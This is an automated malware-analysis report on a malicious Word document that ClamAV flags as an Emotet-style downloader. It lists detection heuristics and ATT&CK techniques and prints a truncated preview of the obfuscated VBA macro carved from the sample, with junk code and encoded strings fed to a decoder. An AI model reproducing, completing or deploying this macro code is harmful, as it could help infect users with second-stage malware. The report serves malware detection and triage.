MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The file is a malicious Office document containing a VBA macro. The 'AutoOpen' macro is present and uses 'CreateObject', indicating execution of arbitrary code. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' and the presence of a VBA macro named 'macros.bas' strongly suggest this document is a downloader for a second-stage payload, likely executed via the 'CreateObject' call.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41211 bytes |
SHA-256: 212a0aade417c4bd13484b6fe47973b96c2fe173acd30bf31db83d3771dddf7f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 15 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "PhoNjoqrQYVI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "PkAiIXtTisuJw"
Function qjRjpujbaud()
On Error Resume Next
Select Case uAImAq
Case 54774
iuTYhO = Hex(78932 - CSng(35713) - 67217 + ChrW(XlTiid))
dMjtOw = AJofOn
End Select
zUUhRSQw = lmIitb("U8Uu2AANAYGAyAgMAgDA2AQZAQDAlBQNAcDA4AgZAUGA0AwYAUGAhBgNAYDAmBgYAMDA1AAOAIGAkBwNAYDAhBANAQDA5AQOAQDAwAgMAEGA3AgMAYDAlBgZAcui", 3, 118)
Select Case nzQdq
Case 8727
EVicfv = Hex(68283 - CSng(44976) - 19095 + ChrW(VftXd))
wPvcYY = JDvVj
End Select
Select Case ljCGN
Case 13182
ZDinZ = Hex(92559 - CSng(42707) - 24887 + ChrW(IdFqYo))
OOBjXX = nBCizL
End Select
KftOqikqJQ = lmIitb("icsiAAUDA4AAOAMGAjBwNAQDAmBgNAEDAwAgNAUGA3AQMAEGAjBwYAQGAlBQYAUDA0AANAUDA2Aw%Yw", 4, 71)
Select Case qqmuzo
Case 31212
hwWLnU = Hex(70341 - CSng(60203) - 62757 + ChrW(wzorMa))
CMvlXN = BwSnT
End Select
Select Case flcqH
Case 46640
VsjoEF = Hex(60174 - CSng(46867) - 72044 + ChrW(mqEOWV))
EQRNKK = pLiwmT
End Select
lFlFuRwrhA = lmIitb("iquwEzAUGAxAwYAIDAkBwNAUGAjBgMAMGAiBgZAkDAhBgZAMGAwAwYAEGA3AAZAMDAjBgNAQDAmBAOAj", 2, 73)
Select Case PuijCl
Case 33372
fPitn = Hex(2644 - CSng(57366) - 83002 + ChrW(IQpmrH))
LhEzs = imRWXv
End Select
Select Case hYbKG
Case 58714
Ulfolf = Hex(48725 - CSng(6020) - 83194 + ChrW(dQDZkE))
EbKVu = acijap
End Select
sWztDo = lmIitb("oMwAMDA0AwYAkDAwAAZAMGAyAQOAcDAzAQYAYDAkBQNAQGAxAgMAgDAiBQMAkDAyAwNAMGAzAwMAgDA3ikA", 4, 77)
Select Case nwYvMj
Case 6488
UTEAz = Hex(15033 - CSng(24010) - 88876 + ChrW(szUXGi))
TapFM = zwOGC
End Select
Select Case rdItGK
Case 72774
kswiS = Hex(29917 - CSng(23292) - 9808 + ChrW(RDBiMP))
QJwnD = twMSvB
End Select
uHFFzs = lmIitb("D1%QCIAMDAiBAMAMGA3AwYAEGAwAQYAIGA2AQMAgDAkBANAIGAyAAZAEDAkBwMAEGA2AANAUGAmBwNAADAzAQZAIDAxAANAQDAxAQZAMGA5AQMAADAjBwNN", 2, 112)
Select Case OwFji
Case 32839
HBPPbC = Hex(88660 - CSng(68054) - 82226 + ChrW(MiOjd))
LwFwzz = zTKmZ
End Select
Select Case PXwQzV
Case 32659
PNVus = Hex(24187 - CSng(61585) - 87171 + ChrW(JdHIJd))
qrTiu = BzTcnR
End Select
lYBluRn = lmIitb("5DAgYAkDAkBQMAkDAiBwNAMGAmBAMAYGA1AgMAkDAlBgMAQDA2AgMAcDAlBgMAMDAmBgNAEDAwAgMAYGwVvRMjQ", 8, 78)
Select Case ohJKf
Case 87448
IsCYs = Hex(3453 - CSng(54319) - 12645 + ChrW(anFtY))
HCmHnM = aQYOU
End Select
Select Case krlGzX
Case 19716
spkKJ = Hex(73902 - CSng(23510) - 84287 + ChrW(lCFfpd))
PMsCPB = QwzGd
End Select
JXFuLLh = lmIitb("pjipGA3AgMAcDAlBQYAADAhBgNAADAjBgZAMDA3AQMAIGA1AQYAQGAhBgYAIGAiBgNAQDAmBQOAEDAzAgMAYGAhBgYAYGA0AgYAYGAj5", 3, 98)
Select Case wOCuqE
Case 79577
tlVzfo = Hex(87095 - CSng(27299) - 47990 + ChrW(vNqrm))
HErZUN = fisfX
End Select
Select Case JzrRi
Case 30072
iSiMJ = Hex(80854 - CSng(93536) - 39595 + ChrW(DhamoW))
ATfKbS = bCifS
End Select
hJSFhIwBsiA = lmIitb("ii5GA5AgYAADA2AAMAYGA3AQZAkDAyAAZAMGAyAAOAgDA1AAOAEDA3AQMAIDAmBgNAkDAjBQZAMDA3AgMAUDAmBgZAIDAlBQZAUGA5AwYAkDAhBwNAADAmBwMAYGAzAQZAYDAlBgNAIDAhBQOAcDAhB8iw", 4, 148)
Select Case bRsjM
Case 82109
oLOAEM = Hex(76871 - CSng(88001) - 41984 + ChrW(BVnKqw))
FoPvH = iKdwW
End Select
Select Case AiZPbz
Case 80664
iShod = Hex(49332 - CSng(60393) - 80719 + ChrW(MbACrP))
jVYXz = mBOSnD
End Select
FldHDPvsL = lmIitb("74pK9AQNAMDAwAgMAMDA5AAOAMGAmBQOAQGAhBQOAcDAmf", 2, 40)
Select Case lsBhbo
Case 3
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.